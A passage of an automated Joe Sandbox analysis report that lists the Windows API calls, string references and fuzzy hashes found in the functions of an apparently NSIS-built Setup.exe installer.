                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                              • String ID: $ @$M$N
                                                                                                                                                                              • API String ID: 1638840714-3479655940
                                                                                                                                                                              • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                              • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                              Strings
                                                                                                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                              • ptF, xrefs: 00406D1A
                                                                                                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                              • \*.*, xrefs: 00406D2F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                              • API String ID: 2035342205-1650287579
                                                                                                                                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
                                                                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                              • String ID: F$A
                                                                                                                                                                              • API String ID: 3347642858-1281894373
                                                                                                                                                                              • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                              • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                              • API String ID: 1916479912-1189179171
                                                                                                                                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406A73
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                              • API String ID: 3581403547-1792361021
                                                                                                                                                                              • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                              • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                              Strings
                                                                                                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                              • API String ID: 542301482-1377821865
                                                                                                                                                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                              • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                              • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                              • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                              • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                              • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                              APIs
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                              • API String ID: 20674999-2124804629
                                                                                                                                                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                              APIs
                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                              • String ID: F$N$open
                                                                                                                                                                              • API String ID: 3928313111-1104729357
                                                                                                                                                                              • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                              • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                              • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
